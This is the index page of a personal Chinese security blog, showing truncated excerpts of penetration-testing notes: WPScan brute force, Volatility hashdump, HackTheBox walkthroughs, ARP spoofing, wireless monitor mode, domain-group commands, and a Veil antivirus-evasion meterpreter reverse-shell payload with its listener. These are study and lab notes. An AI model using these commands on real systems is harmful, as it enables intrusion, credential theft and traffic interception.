avatar
文章
331
标签
30
分类
0

Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About
The Blog of Monoceros406
搜索
Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About

The Blog of Monoceros406

|
WPScan常用方法
发表于2024-01-19|渗透测试
WPScan常用方法参数 –url|-u 扫描指定URL或域名。 –force|-f 如果正在WordPress强制WPScan不检查。 –enumerate|-e [option(s)] 信息枚举 u 用户名id 1-10 u[10-20] 指定用户名id 10-20 p 插件程序 vp 仅漏洞插件程序 ap 所有插件程序(慢) tt timthumbs t 主题 vt 仅漏洞主题 at 所有主题(慢) 常见用法123wpscan -u 192.168.41.130 #收集基本信息wpscan -u 192.168.41.130 -e u vp #列出用户名列表、漏洞插件wpscan -u 192.168.41.130 -e u --wordlist /root/wordlist.txt #用户名密码爆破
Volatility初探
发表于2024-01-19|取证
Volatility初探寻找profile: 1vol -f mem.vmem imageinfo 查看进程: 1vol -f mem.vmem --profile=XXX pslist 进程转储: 1vol -f mem.vmem --profile=XXX memdump -p 2012 -D ./ 查看用户密码: 1vol -f mem.vmem --profile=XXX hashdump 查看cmd进程: 1vol -f mem.vmem --profile=XXX cmdscan 查找flag关键词: 1vol -f mem.vmem --profile=XXX filescan | grep flag 文件转储: 1vol -f mem.vmem --profile=XXX dumpfiles -Q 0X00000123456 -D ./ 查看Windows窗口程序,显示10行内容: 1vol -f mem.vmem --profile=XXX windows | grep flag -A 10 从注册表中提取LSA密钥信息: 1vol -f mem.vm ...
HackTheBox初探
发表于2024-01-19|渗透测试
HackTheBox初探开始使用注册得科学上网,亲测还得用欧洲的,亚洲、中亚、美国的不行… 注册完就无所谓了。 注册后选择Starting Point,OpenVPN方式,下载vpn配置文件,然后连接: 1openvpn xxx.ovpn 直到Starting Point变绿,ifconfig发现多出来一块虚拟网卡tun0。 Meow1nmap -sV 10.129.42.107 23端口有telnet服务,尝试连接: 1telnet 10.129.42.107 尝试一些用户名,例如admin、administrator、root等,发现root账户可免密登录。 拿flag。 Fawn1nmap -sV 10.129.1.14 用了240秒…这速度不敢恭维。 21端口有ftp服务,尝试匿名anonymous登录发现成功,尝试下载: 123lsget flag.txtbye Dancing1nmap -sV 10.129.4.186 455端口显示microsoft-ds?意味着存在Samba服务,尝试连接并列出可用共享标志/开关: 1smbclient -U ro ...
Arjun入门
发表于2024-01-19|渗透测试
Arjun入门检测可能的传参变量,例如id等: 1arjun -u http://www.wangehacker.cn/sqli-labs/Less-1/ 可指定某种方式,如GET POST JSON XML等。 1arjun -u http://www.wangehacker.cn/sqli-labs/Less-1/ -m POST 多线程,默认2: 1arjun -u http://www.wangehacker.cn/sqli-labs/Less-1/ -t 10 自定义标头: 1arjun -u http://www.wangehacker.cn/sqli-labs/Less-1/ --headers "Accept=Language: en-US\nCookie: null" 控制查询块大小,可能最多达到500个参数而达到服务器最大URL长度限制,例如限制到250: 1arjun -u http://www.wangehacker.cn/sqli-labs/Less-1/ -c 250
Linux-C学习笔记
发表于2024-01-15|后端开发
Linux-C学习笔记内存管理动态内存管理12345678long *buffer;buffer=(long *)malloc(400);buffer=(long *)realloc(buffer,256);free(buffer);long *buffer;buffer=(long *)calloc(20,sizeof(long));free(buffer); 链表123456789101112131415161718192021222324252627282930313233343536373839#include <malloc.h>#include <stdio.h>#define LEN sizeof(struct student)typedef struct student{ int num,age; float score; struct student *next;}stu;int n;stu *create(void){ stu *head,*p1,*p2; n=0; p1=p ...
渗透测试常用网站
发表于2024-01-13|渗透测试
渗透测试常用网站17CE:https://www.17ce.com/crt.sh:https://crt.sh/ICP备案查询网:https://www.beianx.cn/IP查询网:https://www.ip138.com/IP反查绑定域名:https://dns.aizhan.com/VirusTotal:https://www.virustotal.com/WhatWeb:https://whatweb.net/爱站工具网:https://whois.aizhan.com/天眼查:https://www.tianyancha.com/微步在线情报社区:https://x.threatbook.com/云悉指纹:https://www.yunsee.cn/站长之家Whois:https://whois.chinaz.com/子成君二级域名挖掘:http://z.zcjun.com/NETCRAFT:https://www.netcraft.com/WebScan:https://www.webscan.cc/GTFOBins:https://gtfobins.github.io ...
中间人攻击
发表于2024-01-13|渗透测试
中间人攻击-ARP欺骗arpspoof语法格式: 12345arpspoof [options] host #-i interface 指定接口 #-t target 指定ARP欺骗的目标 #-r 双向欺骗 与-t一起使用 #host 指定拦截包的主机 通常网关 开启路由转发: 12echo 1 > /proc/sys/net/ipv4/ip_forwardcat /proc/sys/net/ipv4/ip_forward #输出1时成功开启 查看攻击主机和目标主机ARP缓存表,得到网关信息: 1arp 举例:攻击主机IP为192.168.29.134,MAC为00:0c:29:79:95:9e;目标主机IP为192.168.29.134,MAC为00:0c:29:6c:5d:69;网关IP为192.168.29.2,MAC为00:50:56:f1:40:cb。 分别对目标主机和网关实施ARP攻击: 12arpspoof -i eth0 -t 192.168.29.135 192.168.29.2arpspoof -i eth0 -t 192.168 ...
无线网络渗透基础原理
发表于2024-01-13|渗透测试
无线网络渗透基础设置监听模式2.4GHz WiFi网卡1sudo airmon-ng start wlan0 随后系统WiFi断开,wlan0接口改名为wlan0mon。 5GHz WiFi网卡仅支持芯片为RT3572和RTL8812AU的无线网卡,前者开启方式同2.4G网络,后者需要手动开启。 安装驱动: 1sudo apt-get install realtek-rt188xxau-dkms 查看无线网卡模式: 1iwconfig 发现为被管理模式,先停止无线网卡接口,设置为监听模式,再启动: 1234ip link set wlan0 downiwconfig wlan0 mode monitorip link set wlan0 upiwconfig #发现为监听模式 接口名还为wlan0 网络扫描Airodump-ng1airodump-ng wlan0mon 输出结果中每列参数: 列名 含义 BSSID 无线AP的物理地址。 PWR 信号水平,信号值越高离AP越近。为-1时标识客户端不在能监听到的范围内。当BSSID和PWR两列都为-1时,网卡驱动 ...
内网渗透命令大全
发表于2024-01-13|渗透测试
内网渗透命令大全域常用操作命令1234567891011121314151617181920212223242526272829303132net group /domain #获得所有域用户组列表net group qq_group /domain #显示域中qq_group组的成员net group qq_group /del /domain #删除域中qq_group组net group qq_group qq /del/domain #删除域内qq_group群组中的成员qqnet group qq_group /add /domain #增加域中的群组net group "domain admins" /domain #获得域管理员列表net group "enterprise admins" /domain #获得企业管理员列表net localgroup administrators /domain #获取域内置administrators组用户(enterprise admins、domain admins)net group & ...
Veil免杀入门
发表于2024-01-13|恶意代码
Veil免杀入门启动: 1veil 使用Evasion工具: 1use Evation 查看支持的攻击载荷: 1list 选择攻击载荷: 1use cs/meterpreter/rev_tcp.py 查看配置信息并配置: 12optionsset LHOST 192.168.29.134 生成攻击载荷: 1generate 生成可执行文件payload.exe。 还有另一种生成方式,直接使用命令行生成: 1veil -t Evasion -p cs/meterpreter/rev_tcp.py --ip 192.168.195.150 --port 4444 在MSF设置监听: 1234use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.29.134exploit 成功启动Meterpreter会话。
1…222324…34
avatar
Monoceros406
Windows系统安全爱好者
文章
331
标签
30
分类
0
Follow Me
公告
哪里排版出锅了请告诉我QwQ QQ:1295625063
最新文章
Linux编程入门-系统选项2025-06-21
Linux编程入门-时间2025-06-15
Linux编程入门-用户管理与安全2025-06-15
Linux编程入门-内存管理2025-06-15
Linux编程入门-进程2025-06-14
标签
漏洞复现 恶意代码 密码学 Python 渗透测试 取证 编程语言 逆向工程 AWD Win系统调试 其他 GUI开发 解题报告 沙盒逃逸 算法 Win内核安全 OpenSSL 移动安全 UEFI 数学建模 Win驱动开发 WinAPI IoT PWN 前端开发 Web Linux Web3 后端开发 Misc
归档
  • 六月 20258
  • 五月 20259
  • 十二月 202413
  • 十一月 202412
  • 十月 202420
  • 九月 20243
  • 八月 20248
  • 七月 202413
网站资讯
文章数目 :
331
已运行时间 :
1 天
本站访客数 :
14692
本站总访问量 :
21242
最后更新时间 :
1 天前
©2020 - 2025 By Monoceros406
框架 Hexo|主题 Butterfly